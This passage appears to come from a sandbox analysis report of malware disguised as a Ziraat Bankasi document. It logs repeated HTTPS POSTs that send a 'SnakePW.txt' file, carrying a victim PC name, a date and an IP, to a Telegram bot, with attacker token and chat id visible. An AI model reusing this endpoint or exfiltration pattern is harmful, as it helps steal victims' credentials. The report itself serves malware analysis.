                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      74192.168.2.449823149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:04 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcf7ea90d9cc3d
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:01:04 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 37 65 61 39 30 64 39 63 63 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcf7ea90d9cc3dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:04 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:04 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 20
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:04 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 30 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 20","parameters":{"retry_after":20}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      75192.168.2.449824149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:05 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcf8990a312940
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:05 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 38 39 39 30 61 33 31 32 39 34 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcf8990a312940Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:05 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:05 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 19
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:05 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 39 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 19","parameters":{"retry_after":19}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      76192.168.2.449825149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:06 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcf9086c9c212b
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:01:06 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 39 30 38 36 63 39 63 32 31 32 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcf9086c9c212bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:06 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:06 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 18
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:06 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 38 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 38 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 18","parameters":{"retry_after":18}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      77192.168.2.449826149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:07 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcf95a72979d06
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:07 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 39 35 61 37 32 39 37 39 64 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcf95a72979d06Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:07 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:07 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 17
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:07 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 37 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 37 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 17","parameters":{"retry_after":17}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      78192.168.2.449827149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:08 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcf9ac59ba2b7b
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:01:08 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 39 61 63 35 39 62 61 32 62 37 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcf9ac59ba2b7bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:08 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:08 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 16
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:08 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 36 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 36 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 16","parameters":{"retry_after":16}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      79192.168.2.449828149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:09 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcf9ff7eb9cfd7
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:09 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 39 66 66 37 65 62 39 63 66 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcf9ff7eb9cfd7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:09 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:09 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 15
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:09 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 35 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 35 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 15","parameters":{"retry_after":15}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      80192.168.2.449829149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:10 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcfa4a489d1784
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:10 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 61 34 61 34 38 39 64 31 37 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcfa4a489d1784Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:10 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:10 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 14
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:10 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 34 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 34 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 14","parameters":{"retry_after":14}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      81192.168.2.449830149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:11 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcfa9be8e3d3a4
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:01:11 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 61 39 62 65 38 65 33 64 33 61 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcfa9be8e3d3a4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:11 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:11 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 13
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:11 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 33 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 33 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 13","parameters":{"retry_after":13}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      82192.168.2.449831149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:12 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcfaebff733d3c
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:12 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 61 65 62 66 66 37 33 33 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcfaebff733d3cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:12 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:12 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 12
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
